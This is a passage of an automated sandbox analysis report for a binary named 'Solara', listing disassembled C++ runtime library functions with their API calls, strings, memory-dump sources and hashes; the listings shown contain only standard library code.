Instruction Fuzzy Hash: 8B01F935910225ABCF05FBA4E855BFDB7B2AF84720F144108FA11B7391CF349E429790

Function 00C3CE41 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CE48
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CE52
int.LIBCPMT ref: 00C3CE69

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CEA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CEC3
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CED0

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: da52918a9cac64f1d81d0084ac5a5dedcb92ecc0f42f4b5be6b6d77006241548
Instruction ID: 8c2ae523f16e41f2cf957fc1454f7d9286b72c61cce956d848261b0f1c6f171e
Opcode Fuzzy Hash: da52918a9cac64f1d81d0084ac5a5dedcb92ecc0f42f4b5be6b6d77006241548
Instruction Fuzzy Hash: 1001F93591022A9BCF04FF64E855BFE7772AF84714F144018F920AB391CF309E459B90

Function 00C3CF6B Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3CF72
std::_Lockit::_Lockit.LIBCPMT ref: 00C3CF7C
int.LIBCPMT ref: 00C3CF93

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3CFCD
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3CFED
Concurrency::cancel_current_task.LIBCPMT ref: 00C3CFFA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b869bb627d09f937c0a1416687f11d93201147c11d20b2ba19589628c24266aa
Instruction ID: 01453813c444677f38686b36305f2064485c1fbc1049cdb3c096f13b6a99a3bd
Opcode Fuzzy Hash: b869bb627d09f937c0a1416687f11d93201147c11d20b2ba19589628c24266aa
Instruction Fuzzy Hash: E501D639D102269BCB05FBA4E855EADB772AF94314F144509F911AB391CF309E469B90

Function 00C3D000 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D007
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D011
int.LIBCPMT ref: 00C3D028

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D062
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D082
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D08F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: acb47a768c8efc3b281f04d6ce964fdb78c85eed648e9b722239a14db2676170
Instruction ID: a1330f18d2fe5fb22faf77f95016a95badc4a9990cb17dab704d00c64b789253
Opcode Fuzzy Hash: acb47a768c8efc3b281f04d6ce964fdb78c85eed648e9b722239a14db2676170
Instruction Fuzzy Hash: A001D6359102269BCF08FB64E811BBEBBB1AF94710F144008F911AB391CF359E429B90

Function 00C3D1BF Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D1C6
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D1D0
int.LIBCPMT ref: 00C3D1E7

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D221
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D241
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D24E

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 7daaa911a27e3b3ee2392d4b1ebc075e007a8eb1f51e8f83cfbaf60aaaeb4104
Instruction ID: 15d47d89ddbc15aed9079ded27e22041831ce8df495186332ce31dc00e2e7ccc
Opcode Fuzzy Hash: 7daaa911a27e3b3ee2392d4b1ebc075e007a8eb1f51e8f83cfbaf60aaaeb4104
Instruction Fuzzy Hash: B301D679D102299BCF05EBA4E816AAE7771AF84320F144408E911A7391CF349E469B90

Function 00C3D2E9 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D2F0
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D2FA
int.LIBCPMT ref: 00C3D311

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D34B
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D36B
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D378

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: bfc7dcaa73de94a1860cdb07487eacf4ce158356c5a819fdb6e1787c8fbac069
Instruction ID: fab49949d07b3285de5bf6bcacab2908c85ff3924d5393dad32b0eae07a6ff07
Opcode Fuzzy Hash: bfc7dcaa73de94a1860cdb07487eacf4ce158356c5a819fdb6e1787c8fbac069
Instruction Fuzzy Hash: D501C0359002299BCB04EB64F852AAE77B2FF84320F244008F911AB7E1CF349E429B91

Function 00C3D254 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D25B
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D265
int.LIBCPMT ref: 00C3D27C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D2B6
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D2D6
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D2E3

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b0592f85b6fa7e403ca1a679892a3df206625d825990fafad6a5056a10325f11
Instruction ID: 7a1630b300195768847929a9f68c4569e9eb747eb4dcc53c52c40297d0633315
Opcode Fuzzy Hash: b0592f85b6fa7e403ca1a679892a3df206625d825990fafad6a5056a10325f11
Instruction Fuzzy Hash: B801D235D0022A9BCF05EFA4E811BBEB776AF84310F184409E911AB391CF349E42DB90

Function 00C3D37E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D385
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D38F
int.LIBCPMT ref: 00C3D3A6

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D3E0
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D400
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D40D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8577843653bf1b102f2a7b7e80ef5e4d4a51169d5a48dbfbbfd4aa3247c8dbda
Instruction ID: d0dd48e48b2f34f782a3a5d4a654748640e79230876c16cee10e525f764be255
Opcode Fuzzy Hash: 8577843653bf1b102f2a7b7e80ef5e4d4a51169d5a48dbfbbfd4aa3247c8dbda
Instruction Fuzzy Hash: CA01D23590022AABCB05FB64F815ABDB776BF84324F140408E911AB3A1CF349E46AB91

Function 00C29DDE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29DE5
std::_Lockit::_Lockit.LIBCPMT ref: 00C29DEF
int.LIBCPMT ref: 00C29E06

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C29E40
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29E60
Concurrency::cancel_current_task.LIBCPMT ref: 00C29E6D

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4f12341c628df4165ca6162aea7951f7dc03f3c3a8f0c1385a68007a00f26fbf
Instruction ID: 70e8e885bce2d24a746fa6a5d6f8d9957e3ca3de1822e2c7f5c388c994c907af
Opcode Fuzzy Hash: 4f12341c628df4165ca6162aea7951f7dc03f3c3a8f0c1385a68007a00f26fbf
Instruction Fuzzy Hash: BA01D6359003359BCF04EB64E811ABE7775FF85724F254408EA11A7791CF709E81D791

Function 00C29D49 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29D50
std::_Lockit::_Lockit.LIBCPMT ref: 00C29D5A
int.LIBCPMT ref: 00C29D71

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C29DAB
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29DCB
Concurrency::cancel_current_task.LIBCPMT ref: 00C29DD8

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4882b49d614b823749e3c730abd6aad51181c00ae5fc6fb65e9d6afb56114c86
Instruction ID: d824abf86dc09f1ce6f0835e35e0e414995b7c055b7c3664fa8ea70e7f57d721
Opcode Fuzzy Hash: 4882b49d614b823749e3c730abd6aad51181c00ae5fc6fb65e9d6afb56114c86
Instruction Fuzzy Hash: 6E01C035940339ABCB05EB64E811AEEB7B2EF84320F144008E911ABB91CF709A42E791

Function 00C856DB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00D1182A,00000104), ref: 00C85738

Strings

Runtime Error!Program: , xrefs: 00C85704
Microsoft Visual C++ Runtime Library, xrefs: 00C857CD
<program name unknown>, xrefs: 00C85747
..., xrefs: 00C85786

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 4bf8b5fa81d7a8667c7d32d91d6c16258a003511760fd58534a4c42317efa77b
Instruction ID: d292c4888829107cd15404201841b58b2128da1910f2d645311d38dcc565e617
Opcode Fuzzy Hash: 4bf8b5fa81d7a8667c7d32d91d6c16258a003511760fd58534a4c42317efa77b
Instruction Fuzzy Hash: 41212966A40706B7DA2536615C8EEAB379C8B91B5CF044031FD1A92681FAA1CF06C3E9

Function 00C415EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C415F6
_Getvals.LIBCPMT ref: 00C41653
_Mpunct.LIBCPMT ref: 00C4168E
_Mpunct.LIBCPMT ref: 00C416A8

Strings

$+xv, xrefs: 00C416B3

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 8a179c5a753a1a4fe25cd92d4b5999025e5ed7c56337e85651b3bc622489a3e5
Instruction ID: a37e985c2b3a367361422bdb0c2f8ced2e864bb6d5d8d4f69b29ae19c71f27c6
Opcode Fuzzy Hash: 8a179c5a753a1a4fe25cd92d4b5999025e5ed7c56337e85651b3bc622489a3e5
Instruction Fuzzy Hash: D921A2B1804B55AFDB25DF74C840BABBBF8BB09700F08065AF8A9C7A41D770E645DB90

Function 00C86E40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,18400EB0,?,?,00000000,00CA880C,000000FF,?,00C86DC7,00C86F16,?,00C86D9B,00000000), ref: 00C86E75
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C86E87
FreeLibrary.KERNEL32(00000000,?,?,00000000,00CA880C,000000FF,?,00C86DC7,00C86F16,?,00C86D9B,00000000), ref: 00C86EA9

Strings

CorExitProcess, xrefs: 00C86E7F
mscoree.dll, xrefs: 00C86E6E

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dd80a1c9e82338921baf06a3cb51b45b4ede1668ee1806081b3d10e2424bf3e6
Instruction ID: 93ccda4cc7d722245a350669c6343f1eb492191f84cd24b7d6ecbca9e54f173f
Opcode Fuzzy Hash: dd80a1c9e82338921baf06a3cb51b45b4ede1668ee1806081b3d10e2424bf3e6
Instruction Fuzzy Hash: B901623594461AAFDB119F90DC0AFAFBBB9FB46B59F000535E822A36D0DB749900CB94

Function 00C8B99D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00C8B956), ref: 00C8B9AC
GetLastError.KERNEL32(?,00C8B956), ref: 00C8B9B6
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00C8B9F4

Strings

ext-ms-, xrefs: 00C8B9D9
api-ms-, xrefs: 00C8B9C3

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: b1cccc9bf639c20b4b30cc4cd8695f16cd810193dce81bfeffd802e27a3184e7
Instruction ID: 37017bcbfe4fb319f0a7f39709c0ee303889386bf44164b4cc2bd60abd8a4d84
Opcode Fuzzy Hash: b1cccc9bf639c20b4b30cc4cd8695f16cd810193dce81bfeffd802e27a3184e7
Instruction Fuzzy Hash: 9AF01C31680205B6EF203B62DC0BB5D3E759B12B98F144020FA1CA81E2EB71DE549789

Function 00C5A733 Relevance: 7.7, APIs: 5, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00C5A79E
operator+.LIBVCRUNTIME ref: 00C5A7EE
shared_ptr.LIBCMT ref: 00C5A8BA
DName::DName.LIBVCRUNTIME ref: 00C5A8EA
operator+.LIBVCRUNTIME ref: 00C5A94B

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: operator+shared_ptr$NameName::
String ID:
API String ID: 2894330373-0
Opcode ID: 9c5bad8e116d4c758066a381f16367c4957fe9cd0ca82c6dd7d343a279750a94
Instruction ID: f484e1fb33593beb860b57424b9bafab153714eed492a158061c0fe5627f5bde
Opcode Fuzzy Hash: 9c5bad8e116d4c758066a381f16367c4957fe9cd0ca82c6dd7d343a279750a94
Instruction Fuzzy Hash: 966192BC80420AEFCB14CFA6C8449E97BB5FB08345F14C359E8159B251E732978ADF5A

Function 00C22C51 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C22C5D
int.LIBCPMT ref: 00C22C70

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C22CA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22CB9
Concurrency::cancel_current_task.LIBCPMT ref: 00C22CC4

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6906ee6341b37490987d9ee807ebd1d4037180026302d19978e623f016f1373d
Instruction ID: 0173c26bb94025c3b5d05c373daca1bde337b0e2f8da54ecae3faa645d3ccfb5
